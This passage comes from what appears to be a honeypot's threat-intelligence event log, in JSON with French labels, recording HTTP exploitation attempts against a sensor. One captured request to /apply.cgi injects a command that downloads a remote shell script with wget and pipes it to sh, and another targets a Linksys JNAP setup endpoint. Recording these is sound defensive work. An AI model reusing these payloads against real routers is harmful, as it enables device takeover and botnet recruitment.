\u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":432},{"id":11809356,"ip":"45.153.34.219","ts":"2026-07-14 02:18:13.000000","proto":"tcp","src_port":55260,"dst_port":82,"service":"http","classification":"http_smuggling_probe","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 381, \u0022payload_entropy\u0022: 5.2906474004114905, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 79, \u0022tag_count\u0022: 8, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00225106e6e653caf012c2d54f8fed57bccbedb43288\u0022, \u0022event_fingerprint\u0022: \u00226b2c5ff3085684c662d172d85fc6520b04bcf832\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 84, \u0022precision_signals\u0022: [\u0022pat-0842\u0022], \u0022kb_rule_ids\u0022: [\u0022pat-0842\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00221b6b4a3e34d84683924999fb34be1057\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 79}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection: close\\r\\n\\r\\nwl_ssid=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lwizard%3Bbusybox%20wget%20http:\/\/91.92.40.11\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection: close\\r\\n\\r\\nwl_ssid=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lwizard%3Bbusybox%20wget%20http:\/\/91.92.40.11\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022web_injection\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022e21fa05a3df94beaeb088dcc21e07e9dd8e71dba\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 5 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 79\/100 (\u00c9lev\u00e9) \u2014 MITRE TA0001 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 79, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022pat-0842\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022pat-0842\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 5 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":381},{"id":11809357,"ip":"45.153.34.219","ts":"2026-07-14 02:18:13.000000","proto":"tcp","src_port":55266,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":66,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 426, \u0022payload_entropy\u0022: 5.367114847270162, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002226d01c6ce6b37139b843d323b1ef2a95e8528a97\u0022, \u0022event_fingerprint\u0022: \u002246be7d8f39f80a261149ebffcf4c1aeb91d4c093\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022caa367a731782cc0faccfda0fd783631\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\r\\nContent-Length: 236\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\\u0022,\\\u0022com\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\r\\nContent-Length: 236\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\\u0022,\\\u0022com\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00220ab0714a30d0065830f1528d3d90f4f60a0bf749\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 10 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, 